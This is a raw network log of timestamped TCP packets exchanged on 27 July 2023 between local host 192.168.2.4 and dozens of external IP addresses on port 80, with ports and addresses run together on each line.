                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.256594896 CEST4984780192.168.2.469.163.218.51
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.257251978 CEST804984769.163.218.51192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.257821083 CEST4984780192.168.2.469.163.218.51
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.269284010 CEST80498525.196.166.214192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.269325972 CEST80498525.196.166.214192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.269470930 CEST4985280192.168.2.45.196.166.214
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.269470930 CEST4985280192.168.2.45.196.166.214
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.278964043 CEST8049836118.27.125.181192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.279009104 CEST8049836118.27.125.181192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.279072046 CEST8049836118.27.125.181192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.279112101 CEST4983680192.168.2.4118.27.125.181
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.279149055 CEST8049836118.27.125.181192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.279186010 CEST8049836118.27.125.181192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.279234886 CEST8049836118.27.125.181192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.279256105 CEST4983680192.168.2.4118.27.125.181
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.279297113 CEST4983680192.168.2.4118.27.125.181
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.317981958 CEST8049772162.43.120.128192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.318120003 CEST4977280192.168.2.4162.43.120.128
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.319139004 CEST804982539.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.319195986 CEST804982539.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.319232941 CEST804982539.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.319279909 CEST804982539.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.319312096 CEST804982539.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.319322109 CEST4982580192.168.2.439.99.233.155
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.319344044 CEST4982580192.168.2.439.99.233.155
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.319344997 CEST804982539.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.319370985 CEST4982580192.168.2.439.99.233.155
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.319395065 CEST804982539.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.319427967 CEST804982539.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.319475889 CEST804982539.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.319489002 CEST4982580192.168.2.439.99.233.155
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.319509029 CEST804982539.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.319550037 CEST804982539.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.319598913 CEST4982580192.168.2.439.99.233.155
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.319616079 CEST804982539.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.319655895 CEST804982539.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.319703102 CEST804982539.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.319715977 CEST4982580192.168.2.439.99.233.155
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.321676970 CEST4982580192.168.2.439.99.233.155
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.381983995 CEST8049838206.191.152.37192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.386301994 CEST4985380192.168.2.4188.114.97.7
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.402729034 CEST8049853188.114.97.7192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.403078079 CEST4985380192.168.2.4188.114.97.7
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.404242992 CEST4985380192.168.2.4188.114.97.7
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.420603037 CEST8049853188.114.97.7192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.432918072 CEST8049853188.114.97.7192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.433016062 CEST4985380192.168.2.4188.114.97.7
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.434391022 CEST4985380192.168.2.4188.114.97.7
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.438030958 CEST4985480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.443157911 CEST4984780192.168.2.469.163.218.51
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.443378925 CEST804984959.106.19.204192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.443625927 CEST4984980192.168.2.459.106.19.204
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.444101095 CEST4984980192.168.2.459.106.19.204
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.454288960 CEST8049854104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.454381943 CEST8049853188.114.97.7192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.454389095 CEST4985480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.454448938 CEST4985380192.168.2.4188.114.97.7
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.455059052 CEST4985480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.456746101 CEST4985580192.168.2.4172.217.16.179
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.459767103 CEST4985680192.168.2.4104.21.88.198
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.471081018 CEST8049855172.217.16.179192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.471208096 CEST8049854104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.471534014 CEST4985580192.168.2.4172.217.16.179
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.471847057 CEST4985580192.168.2.4172.217.16.179
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.476283073 CEST8049856104.21.88.198192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.476593971 CEST4985680192.168.2.4104.21.88.198
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.476906061 CEST4985680192.168.2.4104.21.88.198
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.483445883 CEST4985780192.168.2.462.122.190.121
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.486236095 CEST8049855172.217.16.179192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.493407965 CEST8049856104.21.88.198192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.518558025 CEST804985762.122.190.121192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.518767118 CEST4985780192.168.2.462.122.190.121
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.519222021 CEST4985780192.168.2.462.122.190.121
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.523472071 CEST4985880192.168.2.4206.191.152.37
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.539757967 CEST4985980192.168.2.469.163.239.62
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.547023058 CEST4986080192.168.2.454.209.32.212
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.553973913 CEST804985762.122.190.121192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.555073977 CEST804985762.122.190.121192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.555270910 CEST4985780192.168.2.462.122.190.121
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.571295023 CEST8049856104.21.88.198192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.571322918 CEST8049856104.21.88.198192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.571362019 CEST8049856104.21.88.198192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.571475983 CEST4985680192.168.2.4104.21.88.198
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.593518019 CEST8049855172.217.16.179192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.595582008 CEST4985580192.168.2.4172.217.16.179
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.597666025 CEST4985780192.168.2.462.122.190.121
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.607620001 CEST804984769.163.218.51192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.634651899 CEST804985762.122.190.121192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.634936094 CEST4985780192.168.2.462.122.190.121
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.650295973 CEST804982539.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.650348902 CEST804982539.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.650382996 CEST804982539.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.650429964 CEST804982539.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.650463104 CEST804982539.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.650477886 CEST4982580192.168.2.439.99.233.155
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.650477886 CEST4982580192.168.2.439.99.233.155
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.650496006 CEST804982539.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.650530100 CEST804982539.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.650549889 CEST4982580192.168.2.439.99.233.155
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.650563002 CEST804982539.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.650568008 CEST4982580192.168.2.439.99.233.155
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.650595903 CEST804982539.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.650604010 CEST4982580192.168.2.439.99.233.155
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.650629997 CEST804982539.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.650661945 CEST804982539.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.650670052 CEST4982580192.168.2.439.99.233.155
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.650693893 CEST804982539.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.650712013 CEST4982580192.168.2.439.99.233.155
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.650727034 CEST804982539.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.650739908 CEST4982580192.168.2.439.99.233.155
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.650739908 CEST4982580192.168.2.439.99.233.155
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.650758982 CEST804982539.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.650767088 CEST4982580192.168.2.439.99.233.155
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.650790930 CEST804982539.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.650845051 CEST804982539.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.650846004 CEST4982580192.168.2.439.99.233.155
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.650877953 CEST804982539.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.650923014 CEST804982539.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.650928020 CEST4982580192.168.2.439.99.233.155
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.651125908 CEST4982580192.168.2.439.99.233.155
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.652312040 CEST804982539.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.652348042 CEST804982539.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.652395010 CEST804982539.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.652426958 CEST804982539.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.652431011 CEST4982580192.168.2.439.99.233.155
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.652461052 CEST804982539.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.652466059 CEST4982580192.168.2.439.99.233.155
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.652493000 CEST804982539.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.652515888 CEST4982580192.168.2.439.99.233.155
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.652525902 CEST804982539.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.652549982 CEST4982580192.168.2.439.99.233.155
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.652560949 CEST804982539.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.652580976 CEST4982580192.168.2.439.99.233.155
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.652592897 CEST804982539.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.652611971 CEST4982580192.168.2.439.99.233.155
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.652626038 CEST804982539.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.652669907 CEST4982580192.168.2.439.99.233.155
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.666999102 CEST4981680192.168.2.496.127.180.42
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.686898947 CEST804986054.209.32.212192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.687679052 CEST4986080192.168.2.454.209.32.212
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.692534924 CEST4986180192.168.2.4208.109.214.162
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.705871105 CEST804985969.163.239.62192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.706031084 CEST4985980192.168.2.469.163.239.62
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.715794086 CEST4986080192.168.2.454.209.32.212
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.720189095 CEST804984959.106.19.204192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.721738100 CEST804984959.106.19.204192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.721777916 CEST804984959.106.19.204192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.721815109 CEST804984959.106.19.204192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.721848965 CEST804984959.106.19.204192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.721895933 CEST804984959.106.19.204192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.721913099 CEST4984980192.168.2.459.106.19.204
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.721914053 CEST4984980192.168.2.459.106.19.204
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.721929073 CEST804984959.106.19.204192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.721970081 CEST4984980192.168.2.459.106.19.204
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.722021103 CEST804984959.106.19.204192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.722055912 CEST804984959.106.19.204192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.722059011 CEST4984980192.168.2.459.106.19.204
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.722090006 CEST804984959.106.19.204192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.722124100 CEST804984959.106.19.204192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.722132921 CEST4984980192.168.2.459.106.19.204
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.722152948 CEST4984980192.168.2.459.106.19.204
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.722414970 CEST4984980192.168.2.459.106.19.204
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.725914001 CEST4985980192.168.2.469.163.239.62
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.783632994 CEST8049858206.191.152.37192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.784055948 CEST4985880192.168.2.4206.191.152.37
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.821892977 CEST4985880192.168.2.4206.191.152.37
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.837320089 CEST4986280192.168.2.4147.154.3.56
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.855063915 CEST804986054.209.32.212192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.855123043 CEST804986054.209.32.212192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.855257034 CEST4986080192.168.2.454.209.32.212
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.855257034 CEST4986080192.168.2.454.209.32.212
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.855602980 CEST8049861208.109.214.162192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.855845928 CEST4986180192.168.2.4208.109.214.162
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.856200933 CEST4986180192.168.2.4208.109.214.162
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.892395973 CEST804985969.163.239.62192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.892739058 CEST804985969.163.239.62192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.892836094 CEST4985980192.168.2.469.163.239.62
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.921447992 CEST4985980192.168.2.469.163.239.62
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.945318937 CEST8049862147.154.3.56192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.945506096 CEST4986280192.168.2.4147.154.3.56
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.945872068 CEST4986280192.168.2.4147.154.3.56
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.987209082 CEST804982539.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.987256050 CEST804982539.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.987282991 CEST804982539.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.987308979 CEST804982539.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.987340927 CEST804982539.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.987370968 CEST804982539.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.987400055 CEST804982539.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.987427950 CEST804982539.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.987457991 CEST804982539.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.987479925 CEST4982580192.168.2.439.99.233.155
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.987483978 CEST804982539.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.987509966 CEST804982539.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.987540960 CEST4982580192.168.2.439.99.233.155
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.987545013 CEST804982539.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.987571001 CEST804982539.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.987593889 CEST804982539.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.987613916 CEST4982580192.168.2.439.99.233.155
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.987660885 CEST4982580192.168.2.439.99.233.155
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.989444971 CEST804982539.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.989950895 CEST4982580192.168.2.439.99.233.155
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.999396086 CEST804984959.106.19.204192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.999414921 CEST804984959.106.19.204192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.999502897 CEST4984980192.168.2.459.106.19.204
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.014200926 CEST4986080192.168.2.454.209.32.212
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.019042015 CEST8049861208.109.214.162192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.019563913 CEST8049861208.109.214.162192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.019675016 CEST4986180192.168.2.4208.109.214.162
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.053570986 CEST8049862147.154.3.56192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.066085100 CEST8049862147.154.3.56192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.067531109 CEST4986280192.168.2.4147.154.3.56
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.068063021 CEST8049862147.154.3.56192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.069581985 CEST4986280192.168.2.4147.154.3.56
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.082041979 CEST8049858206.191.152.37192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.082242966 CEST8049858206.191.152.37192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.082268953 CEST8049858206.191.152.37192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.082285881 CEST8049858206.191.152.37192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.082334995 CEST4985880192.168.2.4206.191.152.37
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.082384109 CEST4985880192.168.2.4206.191.152.37
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.087522984 CEST804985969.163.239.62192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.087816000 CEST804985969.163.239.62192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.088089943 CEST4985980192.168.2.469.163.239.62
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.112315893 CEST4986380192.168.2.43.64.163.50
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.112529039 CEST4986480192.168.2.4170.82.173.30
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.121192932 CEST4985880192.168.2.4206.191.152.37
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.131670952 CEST80498633.64.163.50192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.132715940 CEST4986380192.168.2.43.64.163.50
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.152662039 CEST804986054.209.32.212192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.191987991 CEST4986580192.168.2.4192.252.154.18
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.192873001 CEST4986380192.168.2.43.64.163.50
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.195087910 CEST4986680192.168.2.454.209.32.212
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.211914062 CEST80498633.64.163.50192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.212029934 CEST80498633.64.163.50192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.212400913 CEST4986380192.168.2.43.64.163.50
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.267082930 CEST4986780192.168.2.480.74.154.6
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.286843061 CEST804986780.74.154.6192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.286974907 CEST4986780192.168.2.480.74.154.6
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.289951086 CEST8049865192.252.154.18192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.290040970 CEST4986580192.168.2.4192.252.154.18
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.293031931 CEST4986780192.168.2.480.74.154.6
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.295048952 CEST4986580192.168.2.4192.252.154.18
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.312494040 CEST804986780.74.154.6192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.312540054 CEST804986780.74.154.6192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.312630892 CEST4986780192.168.2.480.74.154.6
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.333494902 CEST4986780192.168.2.480.74.154.6
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.334742069 CEST804986654.209.32.212192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.334847927 CEST4986680192.168.2.454.209.32.212
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.335227966 CEST4986680192.168.2.454.209.32.212
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.348566055 CEST4986880192.168.2.4192.124.249.10
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.353128910 CEST804986780.74.154.6192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.353212118 CEST4986780192.168.2.480.74.154.6
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.369913101 CEST8049868192.124.249.10192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.370011091 CEST4986880192.168.2.4192.124.249.10
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.381156921 CEST8049858206.191.152.37192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.392801046 CEST8049865192.252.154.18192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.394866943 CEST8049865192.252.154.18192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.395601034 CEST4986580192.168.2.4192.252.154.18
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.427220106 CEST4986880192.168.2.4192.124.249.10
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.448739052 CEST8049868192.124.249.10192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.449017048 CEST8049868192.124.249.10192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.449106932 CEST4986880192.168.2.4192.124.249.10
